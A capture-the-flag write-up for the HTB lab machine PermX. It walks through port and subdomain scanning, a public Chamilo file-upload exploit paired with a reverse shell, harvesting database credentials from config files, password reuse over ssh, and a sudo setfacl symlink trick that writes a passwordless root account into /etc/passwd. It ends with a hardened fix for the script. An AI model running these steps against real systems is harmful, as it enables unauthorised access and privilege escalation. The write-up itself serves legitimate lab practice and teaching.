PermX Target Notes
Summary
PermX is an easy HTB machine. It mainly tests the attacker's information-gathering skills: if enumeration is done quickly, the flags follow quickly.
Overall, a relatively simple target machine.
Target machine link: /machines/PermX
I. nmap scanning
1) Port scanning
nmap -sT --min-rate 10000 -p- -oN ports 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.4s latency).
Not shown: 65495 filtered tcp ports (no-response), 38 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue Aug 6 09:44:09 2024 -- 1 IP address (1 host up) scanned in 327.15 seconds
2) Detailed information scanning
nmap -sT -sV -sC -O -p22,80 -oN detail 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.7s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e25c5d8c473ed872f7b4800349866def (ECDSA)
|_ 256 1f41028e6b17189ca0ac5423e9713017 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Linux 3.8 (92%), QNAP QTS 4.0 - 4.2 (92%), Linux 5.3 - 5.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Tue Aug 6 09:57:53 2024 -- 1 IP address (1 host up) scanned in 133.37 seconds
Note the line `http-title: Did not follow redirect to`: the site redirects to a hostname that does not resolve yet.
So we add the domain name to /etc/hosts:
sudo vi /etc/hosts
Add a line mapping 10.10.11.23 to that domain name and save the file.
II. Access to the web
Start brute-forcing subdomains
sudo gobuster dns -d -w /usr/share/SecLists/Discovery/DNS/
[sudo] password for kali:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found:
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
Looking at the results, add the discovered subdomain to /etc/hosts in the same way, then open it in a browser.
It shows a login page, so it is probably a CMS. Search online for any public vulnerability information, and also brute-force directories to see whether any pages leak information.
1) Directory brute-forcing
sudo gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/main (Status: 301) [Size: 313] [--> /main/]
/web (Status: 301) [Size: 312] [--> /web/]
/documentation (Status: 301) [Size: 322] [--> /documentation/]
/bin (Status: 301) [Size: 312] [--> /bin/]
/src (Status: 301) [Size: 312] [--> /src/]
/app (Status: 301) [Size: 312] [--> /app/]
/vendor (Status: 301) [Size: 315] [--> /vendor/]
/LICENSE (Status: 200) [Size: 35147]
/plugin (Status: 301) [Size: 315] [--> /plugin/]
/certificates (Status: 301) [Size: 321] [--> /certificates/]
Progress: 39913 / 220561 (18.10%)
/custompages (Status: 301) [Size: 320] [--> /custompages/]
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
Nothing very useful was revealed by the directory listing.
2) CVE search
Found a file upload vulnerability, CVE-2023-4220.
exploit: /Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit
php-reverse-shell: /tools/web-shells/php-reverse-shell
III. Gaining a foothold
Download both files.
Modify the IP address and port in the file.
chmod +x
We successfully gain a foothold, then upgrade the shell to an interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color # With this, clear can be used to clear the screen.
In the home directory we find the user mtz.
IV. Obtaining mtz user privileges
find / -name 2> /dev/null
Found Chamilo's configuration file; open it and take a look.
cat /var/www/chamilo/app/config/
cat /var/www/chamilo/plugin/sepe/src/
In the configuration file under the app directory we see the database username and password.
Connect to the database:
mysql -u chamilo -p03F6lY3uXAP2bkW8
Access to the database succeeds.
Here we find the admin user's password hash.
We tried cracking the hash with tools such as hashcat, but unfortunately came up empty-handed.
Think about the database password 03F6lY3uXAP2bkW8: could the ssh user mtz be reusing the same password? Give it a try.
sudo ssh mtz@10.10.11.23
03F6lY3uXAP2bkW8
We obtain the user flag.
V. Privilege escalation to root
Running sudo -l shows a script that we can run with sudo:
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
Since the script file is not writable, all we can do is audit it and see whether it can be abused for escalation.
It blocks some obviously malicious input (paths outside /home/mtz and paths containing ..), but it does not check for symbolic links, so we try a symlink.
mtz@permx:~:$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~:$ sudo /opt/ mtz rw /home/mtz/test
mtz@permx:~:$ echo "lingx5::0:0:lingx5:/root:/bin/bash" >> ./test
mtz@permx:~:$ su lingx5
root@permx:/home/mtz:#
We successfully get the root flag.
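As an added example that is not part of the original write-up, here is a hardened version of the script's path check that closes the symlink bypass used above. It assumes the allowed directory is passed in as a parameter (the real script hard-codes /home/mtz) so it can be exercised in a temporary directory.

```shell
#!/bin/bash
# Added example, not from the original write-up: a hardened version of the
# path check in the audited /opt script. The original only compares the
# literal string "$target", so a symlink placed under /home/mtz can point
# anywhere. This check refuses symlinks and canonicalises the path first.
# Assumption: the allowed directory is passed as BASE (the real script
# hard-codes /home/mtz) so the function can be exercised in a temp dir.

# check_target BASE TARGET
# Prints the canonical path and returns 0 if TARGET is a regular,
# non-symlink file whose real location is inside BASE; returns 1 otherwise.
check_target() {
    local base="$1" target="$2" real

    # 1. Refuse symlinks before anything dereferences the path.
    if [ -L "$target" ]; then
        echo "Access denied: symbolic links are not allowed." >&2
        return 1
    fi

    # 2. Resolve '..' components and symlinked parent directories.
    real=$(realpath -e -- "$target" 2>/dev/null) || {
        echo "Target does not exist." >&2
        return 1
    }
    base=$(realpath -e -- "$base" 2>/dev/null) || return 1

    # 3. The canonical path must be strictly below the base directory.
    case "$real" in
        "$base"/*) ;;
        *) echo "Access denied." >&2; return 1 ;;
    esac

    # 4. Only regular files are eligible (no directories or devices).
    if [ ! -f "$real" ]; then
        echo "Target must be a file." >&2
        return 1
    fi

    # Hand the canonical path, not the user-supplied one, to setfacl.
    printf '%s\n' "$real"
}
```

A window still exists between this check and a later setfacl call, so the caller should operate only on the canonical path the function printed.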
Summary
- We scanned with nmap and found http and ssh services; subdomain enumeration of the http service revealed a side site running a CMS.
- On GitHub we found CVE-2023-4220 for the Chamilo framework, ran the exploit following the instructions in the repository, and obtained www-data privileges.
- In the Chamilo framework's configuration file we found the MySQL database credentials and logged in to the database successfully, but the admin password is stored as a hash that is hard to crack.
- We considered the possibility of password reuse between MySQL and ssh, found the mtz user in the home directory, tried an ssh connection, and obtained the privileges of the mtz user.
- The sudo list of mtz contains the /opt/ script; auditing the shell script shows that it can assign permissions on files matching /home/mtz/*, so we used a symlink to obtain write permission on /etc/passwd and escalated to root.